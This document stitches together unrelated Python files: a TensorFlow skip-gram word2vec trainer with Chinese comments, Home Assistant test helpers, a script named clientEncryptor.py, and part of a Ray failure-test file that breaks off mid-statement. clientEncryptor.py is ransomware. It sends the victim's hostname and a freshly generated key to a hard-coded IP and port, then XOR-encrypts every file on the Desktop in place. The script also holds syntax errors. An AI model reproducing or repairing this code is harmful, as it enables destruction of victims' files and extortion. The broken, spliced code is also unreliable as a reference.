input_batch = np.ndarray(shape = (batch_size), dtype = np.int32) #建一个batch大小的数组,保存任意单词
labels = np.ndarray(shape = (batch_size, 1), dtype = np.int32)#建一个(input_batch,1)大小的二维数组,保存任意单词前一个或者后一个单词,从而形成一个pair
label_num = 2*window_size # 一个前后窗口的标签数目
buffer = collections.deque(maxlen = batch_size) #建立一个结构为双向队列的缓冲区,大小不超过3,实际上是为了构造bath以及labels,采用队列的思想
# self.pair_list要改成可以迭代的
# print("generate batch data")
for _ in range(batch_size):
buffer.append(self.pair_list[self.data_index]) #lee 先装1个字 问题:能否灵活装配?
self.data_index = (self.data_index + 1) % self.length_pair_list #lee 由于self.data_index是全域的,他的更新是全程的
# 即使更新到尾部,也可以与头部连接上
# print(buffer)
for i in range(batch_size): #lee 这意味着batch是同时进行多少个窗口
input_batch[i] = int(buffer[i][0])
labels[i, 0] = int(buffer[i][1])
buffer.append(self.pair_list[self.data_index])
self.data_index = (self.data_index + 1) % self.length_pair_list
return input_batch, labels
def train_wordvec(self, vocabulary_size, batch_size, embedding_size, window_size, num_sampled, num_steps):
#定义Skip-Gram Word2Vec模型的网络结构
graph = tf.Graph()
with graph.as_default():
#输入数据, 大小为一个batch_size
train_inputs = tf.placeholder(tf.int32, shape = [batch_size])
#目标数据,大小为[batch_size]
train_labels = tf.placeholder(tf.int32, shape = [batch_size, 1])
#使用cpu进行训练 哥有GPU
# with tf.device('/cpu:0'):
#生成一个vocabulary_size×embedding_size的随机矩阵,为词表中的每个词,随机生成一个embedding size维度大小的向量,
#词向量矩阵,初始时为均匀随机正态分布,tf.random_uniform((4, 4), minval=low,maxval=high,dtype=tf.float32)))
#随机初始化一个值于介于-1和1之间的随机数,矩阵大小为词表大小乘以词向量维度
embeddings = tf.Variable(tf.random_uniform([vocabulary_size, embedding_size], -1.0, 1.0))
#tf.nn.embedding_lookup函数的用法主要是选取一个张量里面索引对应的元素。用于查找对应的wordembedding, ,将输入序列向量化
#tf.nn.embedding_lookup(params, ids, partition_strategy='mod', name=None, validate_indices=True, max_norm=None)
embed = tf.nn.embedding_lookup(embeddings, train_inputs)
#全连接层,Wx+b,设置W大小为,embedding_size×vocabulary_size的权重矩阵,模型内部参数矩阵,初始为截断正太分布
nce_weights = tf.Variable(tf.truncated_normal([vocabulary_size, embedding_size], stddev = 1.0 / math.sqrt(embedding_size)))
# 全连接层,Wx+b,设置W大小为,vocabulary_size×1的偏置
nce_biases = tf.Variable(tf.zeros([vocabulary_size]))
#定义loss,损失函数,tf.reduce_mean求平均值,# 得到NCE损失(负采样得到的损失)
loss = tf.reduce_mean(tf.nn.nce_loss(weights = nce_weights,# 权重
biases = nce_biases,# 偏差
labels = train_labels,# 输入的标签
inputs = embed, # 输入向量
num_sampled = num_sampled,# 负采样的个数
num_classes = vocabulary_size))# 类别数目
#定义优化器,使用梯度下降优化算法
optimizer = tf.train.GradientDescentOptimizer(1.0).minimize(loss)
#计算每个词向量的模,并进行单位归一化,保留词向量维度
norm = tf.sqrt(tf.reduce_sum(tf.square(embeddings), 1, keep_dims = True))
normalized_embeddings = embeddings / norm
#初始化模型变量
init = tf.global_variables_initializer()
#基于构造网络进行训练
queue_readingstate = self.queue_readingstate
# queue_readingstate.put(False)
with tf.Session(graph = graph) as session:
#初始化运行
init.run()
#定义平均损失
average_loss = 0
#每步进行迭代
data_offer_steps = 0 # 数据一共提供了多少步
print("start to training")
for num, step in enumerate(range(num_steps)):
# print("train num is %d, train step is %d"%(num,step))
if len(self.pair_list) == 0:
queue_readingstate.put(False)
self.__readdata()
max_steps_pre_line = len(self.pair_list)//batch_size
print("get data %d"%max_steps_pre_line)
assert max_steps_pre_line > 0
data_offer_steps += max_steps_pre_line
if num >= data_offer_steps:
queue_readingstate.put(False)
self.__readdata()
max_steps_pre_line = len(self.pair_list) // batch_size
assert max_steps_pre_line > 0
data_offer_steps += max_steps_pre_line
batch_inputs, batch_labels = self.generate_batch(batch_size, window_size)
#feed_dict是一个字典,在字典中需要给出每一个用到的占位符的取值。
feed_dict = {train_inputs: batch_inputs, train_labels: batch_labels}
#计算每次迭代中的loss
_, loss_val = session.run([optimizer, loss], feed_dict = feed_dict)
#计算总loss
average_loss += loss_val
if step % 2000 == 0:
if step > 0:
average_loss /= 2000
print("Average loss at step ", step, ":", average_loss)
average_loss = 0
if num%1000==0:print("train num is %d"%num)
print("training is over")
self.final_embeddings = normalized_embeddings.eval()
# 线程停止命令符:队列传递停止命令,在所有tensor结束后
queue_readingstate.put(True)
# return final_embeddings
#保存embedding文件
def save_embedding(self, final_embeddings=None, reverse_dictionary=None):
# final_embeddings = self.final_embeddings
fw = tf.Gfile.open(self.modelpath+"model", 'w')
for index, item in enumerate(final_embeddings):
# fw.write(reverse_dictionary[index] + '\t' + ','.join([str(vec) for vec in item]) + '\n')
fw.write(str(index) + '\t' + ','.join([str(vec) for vec in item]) + '\n')
fw.close()
#训练主函数
def train(self):
# data, count, dictionary, reverse_dictionary = self.build_dataset(self.words, self.min_count)
# vocabulary_size = len(count)
vocabulary_size = self.vocabulary_size
self.train_wordvec(vocabulary_size, self.batch_size, self.embedding_size, self.window_size, self.num_sampled, self.num_steps)
final_embeddings = self.final_embeddings
self.save_embedding(final_embeddings)
def run(self):
vocabulary_size = self.vocabulary_size
print("start muli threding")
print("producter")
Thread_reading = threading.Thread(target=self.lineproduce, args=())
print("consumer")
Thread_train = threading.Thread(target=self.train_wordvec, args=(vocabulary_size, self.batch_size, self.embedding_size, self.window_size, self.num_sampled, self.num_steps))
Thread_train.setDaemon(True)
Thread_reading.start()
Thread_train.start()
# print("writing embedding")
# final_embeddings = self.final_embeddings
# self.save_embedding(final_embeddings)
def main():
vector = SkipGram()
# vector.run()
if __name__ == '__main__':
main()
|
common.py
|
"""Test the helper method for writing tests."""
import asyncio
from datetime import timedelta
import functools as ft
import json
import os
import sys
from unittest.mock import patch, MagicMock, Mock
from io import StringIO
import logging
import threading
from contextlib import contextmanager
from homeassistant import auth, core as ha, data_entry_flow, config_entries
from homeassistant.setup import setup_component, async_setup_component
from homeassistant.config import async_process_component_config
from homeassistant.helpers import (
intent, entity, restore_state, entity_registry,
entity_platform, storage)
from homeassistant.util.unit_system import METRIC_SYSTEM
import homeassistant.util.dt as date_util
import homeassistant.util.yaml as yaml
from homeassistant.const import (
STATE_ON, STATE_OFF, DEVICE_DEFAULT_NAME, EVENT_TIME_CHANGED,
EVENT_STATE_CHANGED, EVENT_PLATFORM_DISCOVERED, ATTR_SERVICE,
ATTR_DISCOVERED, SERVER_PORT, EVENT_HOMEASSISTANT_CLOSE)
from homeassistant.components import mqtt, recorder
from homeassistant.util.async_ import (
run_callback_threadsafe, run_coroutine_threadsafe)
_TEST_INSTANCE_PORT = SERVER_PORT
_LOGGER = logging.getLogger(__name__)
INSTANCES = []
def threadsafe_callback_factory(func):
"""Create threadsafe functions out of callbacks.
Callback needs to have `hass` as first argument.
"""
@ft.wraps(func)
def threadsafe(*args, **kwargs):
"""Call func threadsafe."""
hass = args[0]
return run_callback_threadsafe(
hass.loop, ft.partial(func, *args, **kwargs)).result()
return threadsafe
def threadsafe_coroutine_factory(func):
"""Create threadsafe functions out of coroutine.
Callback needs to have `hass` as first argument.
"""
@ft.wraps(func)
def threadsafe(*args, **kwargs):
"""Call func threadsafe."""
hass = args[0]
return run_coroutine_threadsafe(
func(*args, **kwargs), hass.loop).result()
return threadsafe
def get_test_config_dir(*add_path):
"""Return a path to a test config dir."""
return os.path.join(os.path.dirname(__file__), 'testing_config', *add_path)
def get_test_home_assistant():
"""Return a Home Assistant object pointing at test config directory."""
if sys.platform == "win32":
loop = asyncio.ProactorEventLoop()
else:
loop = asyncio.new_event_loop()
hass = loop.run_until_complete(async_test_home_assistant(loop))
stop_event = threading.Event()
def run_loop():
"""Run event loop."""
# pylint: disable=protected-access
loop._thread_ident = threading.get_ident()
loop.run_forever()
stop_event.set()
orig_stop = hass.stop
def start_hass(*mocks):
"""Start hass."""
run_coroutine_threadsafe(hass.async_start(), loop=hass.loop).result()
def stop_hass():
"""Stop hass."""
orig_stop()
stop_event.wait()
loop.close()
hass.start = start_hass
hass.stop = stop_hass
threading.Thread(name="LoopThread", target=run_loop, daemon=False).start()
return hass
# pylint: disable=protected-access
@asyncio.coroutine
def async_test_home_assistant(loop):
"""Return a Home Assistant object pointing at test config dir."""
hass = ha.HomeAssistant(loop)
hass.config.async_load = Mock()
store = auth.AuthStore(hass)
hass.auth = auth.AuthManager(hass, store, {})
ensure_auth_manager_loaded(hass.auth)
INSTANCES.append(hass)
orig_async_add_job = hass.async_add_job
def async_add_job(target, *args):
"""Add a magic mock."""
if isinstance(target, Mock):
return mock_coro(target(*args))
return orig_async_add_job(target, *args)
hass.async_add_job = async_add_job
hass.config.location_name = 'test home'
hass.config.config_dir = get_test_config_dir()
hass.config.latitude = 32.87336
hass.config.longitude = -117.22743
hass.config.elevation = 0
hass.config.time_zone = date_util.get_time_zone('US/Pacific')
hass.config.units = METRIC_SYSTEM
hass.config.skip_pip = True
hass.config_entries = config_entries.ConfigEntries(hass, {})
hass.config_entries._entries = []
hass.config_entries._store._async_ensure_stop_listener = lambda: None
hass.state = ha.CoreState.running
# Mock async_start
orig_start = hass.async_start
@asyncio.coroutine
def mock_async_start():
"""Start the mocking."""
# We only mock time during tests and we want to track tasks
with patch('homeassistant.core._async_create_timer'), \
patch.object(hass, 'async_stop_track_tasks'):
yield from orig_start()
hass.async_start = mock_async_start
@ha.callback
def clear_instance(event):
"""Clear global instance."""
INSTANCES.remove(hass)
hass.bus.async_listen_once(EVENT_HOMEASSISTANT_CLOSE, clear_instance)
return hass
def get_test_instance_port():
"""Return unused port for running test instance.
The socket that holds the default port does not get released when we stop
HA in a different test case. Until I have figured out what is going on,
let's run each test on a different port.
"""
global _TEST_INSTANCE_PORT
_TEST_INSTANCE_PORT += 1
return _TEST_INSTANCE_PORT
@ha.callback
def async_mock_service(hass, domain, service, schema=None):
"""Set up a fake service & return a calls log list to this service."""
calls = []
@asyncio.coroutine
def mock_service_log(call): # pylint: disable=unnecessary-lambda
"""Mock service call."""
calls.append(call)
hass.services.async_register(
domain, service, mock_service_log, schema=schema)
return calls
mock_service = threadsafe_callback_factory(async_mock_service)
@ha.callback
def async_mock_intent(hass, intent_typ):
"""Set up a fake intent handler."""
intents = []
class MockIntentHandler(intent.IntentHandler):
intent_type = intent_typ
@asyncio.coroutine
def async_handle(self, intent):
"""Handle the intent."""
intents.append(intent)
return intent.create_response()
intent.async_register(hass, MockIntentHandler())
return intents
@ha.callback
def async_fire_mqtt_message(hass, topic, payload, qos=0, retain=False):
"""Fire the MQTT message."""
if isinstance(payload, str):
payload = payload.encode('utf-8')
msg = mqtt.Message(topic, payload, qos, retain)
hass.async_run_job(hass.data['mqtt']._mqtt_on_message, None, None, msg)
fire_mqtt_message = threadsafe_callback_factory(async_fire_mqtt_message)
@ha.callback
def async_fire_time_changed(hass, time):
"""Fire a time changes event."""
hass.bus.async_fire(EVENT_TIME_CHANGED, {'now': time})
fire_time_changed = threadsafe_callback_factory(async_fire_time_changed)
def fire_service_discovered(hass, service, info):
"""Fire the MQTT message."""
hass.bus.fire(EVENT_PLATFORM_DISCOVERED, {
ATTR_SERVICE: service,
ATTR_DISCOVERED: info
})
def load_fixture(filename):
"""Load a fixture."""
path = os.path.join(os.path.dirname(__file__), 'fixtures', filename)
with open(path, encoding='utf-8') as fptr:
return fptr.read()
def mock_state_change_event(hass, new_state, old_state=None):
"""Mock state change envent."""
event_data = {
'entity_id': new_state.entity_id,
'new_state': new_state,
}
if old_state:
event_data['old_state'] = old_state
hass.bus.fire(EVENT_STATE_CHANGED, event_data)
@asyncio.coroutine
def async_mock_mqtt_component(hass, config=None):
"""Mock the MQTT component."""
if config is None:
config = {mqtt.CONF_BROKER: 'mock-broker'}
with patch('paho.mqtt.client.Client') as mock_client:
mock_client().connect.return_value = 0
mock_client().subscribe.return_value = (0, 0)
mock_client().publish.return_value = (0, 0)
result = yield from async_setup_component(hass, mqtt.DOMAIN, {
mqtt.DOMAIN: config
})
assert result
hass.data['mqtt'] = MagicMock(spec_set=hass.data['mqtt'],
wraps=hass.data['mqtt'])
return hass.data['mqtt']
mock_mqtt_component = threadsafe_coroutine_factory(async_mock_mqtt_component)
@ha.callback
def mock_component(hass, component):
"""Mock a component is setup."""
if component in hass.config.components:
AssertionError("Component {} is already setup".format(component))
hass.config.components.add(component)
def mock_registry(hass, mock_entries=None):
"""Mock the Entity Registry."""
registry = entity_registry.EntityRegistry(hass)
registry.entities = mock_entries or {}
hass.data[entity_registry.DATA_REGISTRY] = registry
return registry
class MockUser(auth.User):
"""Mock a user in Home Assistant."""
def __init__(self, id='mock-id', is_owner=True, is_active=True,
name='Mock User'):
"""Initialize mock user."""
super().__init__(id, is_owner, is_active, name)
def add_to_hass(self, hass):
"""Test helper to add entry to hass."""
return self.add_to_auth_manager(hass.auth)
def add_to_auth_manager(self, auth_mgr):
"""Test helper to add entry to hass."""
ensure_auth_manager_loaded(auth_mgr)
auth_mgr._store.users[self.id] = self
return self
@ha.callback
def ensure_auth_manager_loaded(auth_mgr):
"""Ensure an auth manager is considered loaded."""
store = auth_mgr._store
if store.clients is None:
store.clients = {}
if store.users is None:
store.users = {}
class MockModule(object):
"""Representation of a fake module."""
# pylint: disable=invalid-name
def __init__(self, domain=None, dependencies=None, setup=None,
requirements=None, config_schema=None, platform_schema=None,
async_setup=None, async_setup_entry=None,
async_unload_entry=None):
"""Initialize the mock module."""
self.DOMAIN = domain
self.DEPENDENCIES = dependencies or []
self.REQUIREMENTS = requirements or []
if config_schema is not None:
self.CONFIG_SCHEMA = config_schema
if platform_schema is not None:
self.PLATFORM_SCHEMA = platform_schema
if setup is not None:
# We run this in executor, wrap it in function
self.setup = lambda *args: setup(*args)
if async_setup is not None:
self.async_setup = async_setup
if setup is None and async_setup is None:
self.async_setup = mock_coro_func(True)
if async_setup_entry is not None:
self.async_setup_entry = async_setup_entry
if async_unload_entry is not None:
self.async_unload_entry = async_unload_entry
class MockPlatform(object):
"""Provide a fake platform."""
# pylint: disable=invalid-name
def __init__(self, setup_platform=None, dependencies=None,
platform_schema=None, async_setup_platform=None,
async_setup_entry=None, scan_interval=None):
"""Initialize the platform."""
self.DEPENDENCIES = dependencies or []
if platform_schema is not None:
self.PLATFORM_SCHEMA = platform_schema
if scan_interval is not None:
self.SCAN_INTERVAL = scan_interval
if setup_platform is not None:
# We run this in executor, wrap it in function
self.setup_platform = lambda *args: setup_platform(*args)
if async_setup_platform is not None:
self.async_setup_platform = async_setup_platform
if async_setup_entry is not None:
self.async_setup_entry = async_setup_entry
if setup_platform is None and async_setup_platform is None:
self.async_setup_platform = mock_coro_func()
class MockEntityPlatform(entity_platform.EntityPlatform):
"""Mock class with some mock defaults."""
def __init__(
self, hass,
logger=None,
domain='test_domain',
platform_name='test_platform',
platform=None,
scan_interval=timedelta(seconds=15),
entity_namespace=None,
async_entities_added_callback=lambda: None
):
"""Initialize a mock entity platform."""
if logger is None:
logger = logging.getLogger('homeassistant.helpers.entity_platform')
# Otherwise the constructor will blow up.
if (isinstance(platform, Mock) and
isinstance(platform.PARALLEL_UPDATES, Mock)):
platform.PARALLEL_UPDATES = 0
super().__init__(
hass=hass,
logger=logger,
domain=domain,
platform_name=platform_name,
platform=platform,
scan_interval=scan_interval,
entity_namespace=entity_namespace,
async_entities_added_callback=async_entities_added_callback,
)
class MockToggleDevice(entity.ToggleEntity):
"""Provide a mock toggle device."""
def __init__(self, name, state):
"""Initialize the mock device."""
self._name = name or DEVICE_DEFAULT_NAME
self._state = state
self.calls = []
@property
def name(self):
"""Return the name of the device if any."""
self.calls.append(('name', {}))
return self._name
@property
def state(self):
"""Return the name of the device if any."""
self.calls.append(('state', {}))
return self._state
@property
def is_on(self):
"""Return true if device is on."""
self.calls.append(('is_on', {}))
return self._state == STATE_ON
def turn_on(self, **kwargs):
"""Turn the device on."""
self.calls.append(('turn_on', kwargs))
self._state = STATE_ON
def turn_off(self, **kwargs):
"""Turn the device off."""
self.calls.append(('turn_off', kwargs))
self._state = STATE_OFF
def last_call(self, method=None):
"""Return the last call."""
if not self.calls:
return None
elif method is None:
return self.calls[-1]
else:
try:
return next(call for call in reversed(self.calls)
if call[0] == method)
except StopIteration:
return None
class MockConfigEntry(config_entries.ConfigEntry):
"""Helper for creating config entries that adds some defaults."""
def __init__(self, *, domain='test', data=None, version=0, entry_id=None,
source=data_entry_flow.SOURCE_USER, title='Mock Title',
state=None):
"""Initialize a mock config entry."""
kwargs = {
'entry_id': entry_id or 'mock-id',
'domain': domain,
'data': data or {},
'version': version,
'title': title
}
if source is not None:
kwargs['source'] = source
if state is not None:
kwargs['state'] = state
super().__init__(**kwargs)
def add_to_hass(self, hass):
"""Test helper to add entry to hass."""
hass.config_entries._entries.append(self)
def add_to_manager(self, manager):
"""Test helper to add entry to entry manager."""
manager._entries.append(self)
def patch_yaml_files(files_dict, endswith=True):
"""Patch load_yaml with a dictionary of yaml files."""
# match using endswith, start search with longest string
matchlist = sorted(list(files_dict.keys()), key=len) if endswith else []
def mock_open_f(fname, **_):
"""Mock open() in the yaml module, used by load_yaml."""
# Return the mocked file on full match
if fname in files_dict:
_LOGGER.debug("patch_yaml_files match %s", fname)
res = StringIO(files_dict[fname])
setattr(res, 'name', fname)
return res
# Match using endswith
for ends in matchlist:
if fname.endswith(ends):
_LOGGER.debug("patch_yaml_files end match %s: %s", ends, fname)
res = StringIO(files_dict[ends])
setattr(res, 'name', fname)
return res
# Fallback for hass.components (i.e. services.yaml)
if 'homeassistant/components' in fname:
_LOGGER.debug("patch_yaml_files using real file: %s", fname)
return open(fname, encoding='utf-8')
# Not found
raise FileNotFoundError("File not found: {}".format(fname))
return patch.object(yaml, 'open', mock_open_f, create=True)
def mock_coro(return_value=None):
"""Return a coro that returns a value."""
return mock_coro_func(return_value)()
def mock_coro_func(return_value=None):
"""Return a method to create a coro function that returns a value."""
@asyncio.coroutine
def coro(*args, **kwargs):
"""Fake coroutine."""
return return_value
return coro
@contextmanager
def assert_setup_component(count, domain=None):
"""Collect valid configuration from setup_component.
- count: The amount of valid platforms that should be setup
- domain: The domain to count is optional. It can be automatically
determined most of the time
Use as a context manager around setup.setup_component
with assert_setup_component(0) as result_config:
setup_component(hass, domain, start_config)
# using result_config is optional
"""
config = {}
@ha.callback
def mock_psc(hass, config_input, domain):
"""Mock the prepare_setup_component to capture config."""
res = async_process_component_config(
hass, config_input, domain)
config[domain] = None if res is None else res.get(domain)
_LOGGER.debug("Configuration for %s, Validated: %s, Original %s",
domain, config[domain], config_input.get(domain))
return res
assert isinstance(config, dict)
with patch('homeassistant.config.async_process_component_config',
mock_psc):
yield config
if domain is None:
assert len(config) == 1, ('assert_setup_component requires DOMAIN: {}'
.format(list(config.keys())))
domain = list(config.keys())[0]
res = config.get(domain)
res_len = 0 if res is None else len(res)
assert res_len == count, 'setup_component failed, expected {} got {}: {}' \
.format(count, res_len, res)
def init_recorder_component(hass, add_config=None):
"""Initialize the recorder."""
config = dict(add_config) if add_config else {}
config[recorder.CONF_DB_URL] = 'sqlite://' # In memory DB
with patch('homeassistant.components.recorder.migration.migrate_schema'):
assert setup_component(hass, recorder.DOMAIN,
{recorder.DOMAIN: config})
assert recorder.DOMAIN in hass.config.components
_LOGGER.info("In-memory recorder successfully started")
def mock_restore_cache(hass, states):
"""Mock the DATA_RESTORE_CACHE."""
key = restore_state.DATA_RESTORE_CACHE
hass.data[key] = {
state.entity_id: state for state in states}
_LOGGER.debug('Restore cache: %s', hass.data[key])
assert len(hass.data[key]) == len(states), \
"Duplicate entity_id? {}".format(states)
hass.state = ha.CoreState.starting
mock_component(hass, recorder.DOMAIN)
class MockDependency:
"""Decorator to mock install a dependency."""
def __init__(self, root, *args):
"""Initialize decorator."""
self.root = root
self.submodules = args
def __enter__(self):
"""Start mocking."""
def resolve(mock, path):
"""Resolve a mock."""
if not path:
return mock
return resolve(getattr(mock, path[0]), path[1:])
base = MagicMock()
to_mock = {
"{}.{}".format(self.root, tom): resolve(base, tom.split('.'))
for tom in self.submodules
}
to_mock[self.root] = base
self.patcher = patch.dict('sys.modules', to_mock)
self.patcher.start()
return base
def __exit__(self, *exc):
"""Stop mocking."""
self.patcher.stop()
return False
def __call__(self, func):
"""Apply decorator."""
def run_mocked(*args, **kwargs):
"""Run with mocked dependencies."""
with self as base:
args = list(args) + [base]
func(*args, **kwargs)
return run_mocked
class MockEntity(entity.Entity):
"""Mock Entity class."""
def __init__(self, **values):
"""Initialize an entity."""
self._values = values
if 'entity_id' in values:
self.entity_id = values['entity_id']
@property
def name(self):
"""Return the name of the entity."""
return self._handle('name')
@property
def should_poll(self):
"""Return the ste of the polling."""
return self._handle('should_poll')
@property
def unique_id(self):
"""Return the unique ID of the entity."""
return self._handle('unique_id')
@property
def available(self):
"""Return True if entity is available."""
return self._handle('available')
def _handle(self, attr):
"""Helper for the attributes."""
if attr in self._values:
return self._values[attr]
return getattr(super(), attr)
@contextmanager
def mock_storage(data=None):
"""Mock storage.
Data is a dict {'key': {'version': version, 'data': data}}
Written data will be converted to JSON to ensure JSON parsing works.
"""
if data is None:
data = {}
orig_load = storage.Store._async_load
async def mock_async_load(store):
"""Mock version of load."""
if store._data is None:
# No data to load
if store.key not in data:
return None
store._data = data.get(store.key)
# Route through original load so that we trigger migration
loaded = await orig_load(store)
_LOGGER.info('Loading data for %s: %s', store.key, loaded)
return loaded
def mock_write_data(store, path, data_to_write):
"""Mock version of write data."""
# To ensure that the data can be serialized
_LOGGER.info('Writing data to %s: %s', store.key, data_to_write)
data[store.key] = json.loads(json.dumps(data_to_write))
with patch('homeassistant.helpers.storage.Store._async_load',
side_effect=mock_async_load, autospec=True), \
patch('homeassistant.helpers.storage.Store._write_data',
side_effect=mock_write_data, autospec=True):
yield data
async def flush_store(store):
"""Make sure all delayed writes of a store are written."""
if store._data is None:
return
await store._async_handle_write_data()
|
clientEncryptor.py
|
import random
import os
import threading
import queue
import socket
# Encryption function that the threads will call
def encrypt(key):
while True:
file = q.get()
print(f'Encrypting {file}')
try:
key_index = 0
max_key_index = len(key) - 1
encrypted_data = ''
with open(file, 'rb') as f:
data = f.read()
with open(file, 'w') as f:
f.write()
for byte in data:
xor_byte = byte ^ ord(key[key_index])
with open(file, 'ab') as f:
f.write(xor_byte.to_bytes(1, 'little'))
if key_index >= max_key_index:
key_index = 0
else:
key_index += 1
print(f'{file} encrypted successfully')
except:
print(f'Failed to encrypt {file}')
q.task_done()
# socket info
ipAddr = '192.0.0.44'
port = 4555
# encryption info
encryptionLevel = 512 // 8
keyCharOptions = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz1234567890~`!@#$%^&*()_+=-<>?'
keyCharOptionsLen = len(keyCharOptions)
# grab the files to encrypt
print('Getting files ready...')
desktopPath = os.environ['USERPROFILE'] + '\\Desktop'
files = os.listdir(desktopPath)
absFiles = []
for f in files:
if os.path.isfile(f'{desktopPath}\\{f}') and f != __file__[:-2]+'exe':
absFiles.append(f'{desktopPath}\\{f}')
print('successfulle located all te files')
# grab clients hostname
hostname = os.getenv('COMPUTERNAME')
# generate the key
print('generating the key')
key = ''
for i in range(encryptionLevel):
key += keyCharOptions[random.randint(0, keyCharOptionsLen = 1)]
print('key generated')
# connect to the server and send the key and hostname
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
s.connect((ipAddr, port))
print('successfully connected. sending hostname and key...')
s.send(f'{hostname} : {key}'.encode('utf-8'))
print('finished transmitting data')
s.close()
# store the files in a queue for the threads to handle
q = queue.Queue()
for f in absFiles:
q.put(f)
# setup threads to get ready for encryption
for i in range(10):
t = threading.Thread(target=encrypt, args=(key,), daemon=True)
t.start()
q.join()
print('encryption and upload complete')
input()
|
test_failure.py
|
import json
import logging
import os
import signal
import sys
import tempfile
import threading
import time
import numpy as np
import pytest
import redis
import ray
import ray.utils
import ray.ray_constants as ray_constants
from ray.exceptions import RayTaskError
from ray.cluster_utils import Cluster
from ray.test_utils import (
wait_for_condition,
SignalActor,
init_error_pubsub,
get_error_message,
Semaphore,
new_scheduler_enabled,
)
def test_failed_task(ray_start_regular, error_pubsub):
@ray.remote
def throw_exception_fct1():
raise Exception("Test function 1 intentionally failed.")
@ray.remote
def throw_exception_fct2():
raise Exception("Test function 2 intentionally failed.")
@ray.remote(num_returns=3)
def throw_exception_fct3(x):
raise Exception("Test function 3 intentionally failed.")
p = error_pubsub
throw_exception_fct1.remote()
throw_exception_fct1.remote()
msgs = get_error_message(p, 2, ray_constants.TASK_PUSH_ERROR)
assert len(msgs) == 2
for msg in msgs:
assert "Test function 1 intentionally failed." in msg.error_message
x = throw_exception_fct2.remote()
try:
ray.get(x)
except Exception as e:
assert "Test function 2 intentionally failed." in str(e)
else:
# ray.get should throw an exception.
assert False
x, y, z = throw_exception_fct3.remote(1.0)
for ref in [x, y, z]:
try:
ray.get(ref)
except Exception as e:
assert "Test function 3 intentionally failed." in str(e)
else:
# ray.get should throw an exception.
assert False
class CustomException(ValueError):
pass
@ray.remote
def f():
raise CustomException("This function failed.")
try:
ray.get(f.remote())
except Exception as e:
assert "This function failed." in str(e)
assert isinstance(e, CustomException)
assert isinstance(e, ray.exceptions.RayTaskError)
assert "RayTaskError(CustomException)" in repr(e)
else:
# ray.get should throw an exception.
assert False
def test_push_error_to_driver_through_redis(ray_start_regular, error_pubsub):
address_info = ray_start_regular
address = address_info["redis_address"]
redis_client = ray._private.services.create_redis_client(
address, password=ray.ray_constants.REDIS_DEFAULT_PASSWORD)
error_message = "Test error message"
ray.utils.push_error_to_driver_through_redis(
redis_client, ray_constants.DASHBOARD_AGENT_DIED_ERROR, error_message)
errors = get_error_message(error_pubsub, 1,
ray_constants.DASHBOARD_AGENT_DIED_ERROR)
assert errors[0].type == ray_constants.DASHBOARD_AGENT_DIED_ERROR
assert errors[0].error_message == error_message
def test_get_throws_quickly_when_found_exception(ray_start_regular):
# We use an actor instead of functions here. If we use functions, it's
# very likely that two normal tasks are submitted before the first worker
# is registered to Raylet. Since `maximum_startup_concurrency` is 1,
# the worker pool will wait for the registration of the first worker
# and skip starting new workers. The result is, the two tasks will be
# executed sequentially, which breaks an assumption of this test case -
# the two tasks run in parallel.
@ray.remote
class Actor(object):
def bad_func1(self):
raise Exception("Test function intentionally failed.")
def bad_func2(self):
os._exit(0)
def slow_func(self, signal):
ray.get(signal.wait.remote())
def expect_exception(objects, exception):
with pytest.raises(ray.exceptions.RayError) as err:
ray.get(objects)
assert err.type is exception
signal1 = SignalActor.remote()
actor = Actor.options(max_concurrency=2).remote()
expect_exception(
[actor.bad_func1.remote(),
actor.slow_func.remote(signal1)], ray.exceptions.RayTaskError)
ray.get(signal1.send.remote())
signal2 = SignalActor.remote()
actor = Actor.options(max_concurrency=2).remote()
expect_exception(
[actor.bad_func2.remote(),
actor.slow_func.remote(signal2)], ray.exceptions.RayActorError)
ray.get(signal2.send.remote())
def test_fail_importing_remote_function(ray_start_2_cpus, error_pubsub):
p = error_pubsub
# Create the contents of a temporary Python file.
temporary_python_file = """
def temporary_helper_function():
return 1
"""
f = tempfile.NamedTemporaryFile(suffix=".py")
f.write(temporary_python_file.encode("ascii"))
f.flush()
directory = os.path.dirname(f.name)
# Get the module name and strip ".py" from the end.
module_name = os.path.basename(f.name)[:-3]
sys.path.append(directory)
module = __import__(module_name)
# Define a function that closes over this temporary module. This should
# fail when it is unpickled.
@ray.remote
def g(x, y=3):
try:
module.temporary_python_file()
except Exception:
# This test is not concerned with the error from running this
# function. Only from unpickling the remote function.
pass
# Invoke the function so that the definition is exported.
g.remote(1, y=2)
errors = get_error_message(
p, 2, ray_constants.REGISTER_REMOTE_FUNCTION_PUSH_ERROR)
assert errors[0].type == ray_constants.REGISTER_REMOTE_FUNCTION_PUSH_ERROR
assert "No module named" in errors[0].error_message
assert "No module named" in errors[1].error_message
# Check that if we try to call the function it throws an exception and
# does not hang.
for _ in range(10):
with pytest.raises(
Exception, match="This function was not imported properly."):
ray.get(g.remote(1, y=2))
f.close()
# Clean up the junk we added to sys.path.
sys.path.pop(-1)
def test_failed_function_to_run(ray_start_2_cpus, error_pubsub):
p = error_pubsub
def f(worker):
if ray.worker.global_worker.mode == ray.WORKER_MODE:
raise Exception("Function to run failed.")
ray.worker.global_worker.run_function_on_all_workers(f)
# Check that the error message is in the task info.
errors = get_error_message(p, 2, ray_constants.FUNCTION_TO_RUN_PUSH_ERROR)
assert len(errors) == 2
assert errors[0].type == ray_constants.FUNCTION_TO_RUN_PUSH_ERROR
assert "Function to run failed." in errors[0].error_message
assert "Function to run failed." in errors[1].error_message
def test_fail_importing_actor(ray_start_regular, error_pubsub):
p = error_pubsub
# Create the contents of a temporary Python file.
temporary_python_file = """
def temporary_helper_function():
return 1
"""
f = tempfile.NamedTemporaryFile(suffix=".py")
f.write(temporary_python_file.encode("ascii"))
f.flush()
directory = os.path.dirname(f.name)
# Get the module name and strip ".py" from the end.
module_name = os.path.basename(f.name)[:-3]
sys.path.append(directory)
module = __import__(module_name)
# Define an actor that closes over this temporary module. This should
# fail when it is unpickled.
@ray.remote
class Foo:
def __init__(self, arg1, arg2=3):
self.x = module.temporary_python_file()
def get_val(self, arg1, arg2=3):
return 1
# There should be no errors yet.
errors = get_error_message(p, 2)
assert len(errors) == 0
# Create an actor.
foo = Foo.remote(3, arg2=0)
errors = get_error_message(p, 2)
assert len(errors) == 2
for error in errors:
# Wait for the error to arrive.
if error.type == ray_constants.REGISTER_ACTOR_PUSH_ERROR:
assert "No module named" in error.error_message
else:
# Wait for the error from when the __init__ tries to run.
assert ("failed to be imported, and so cannot execute this method"
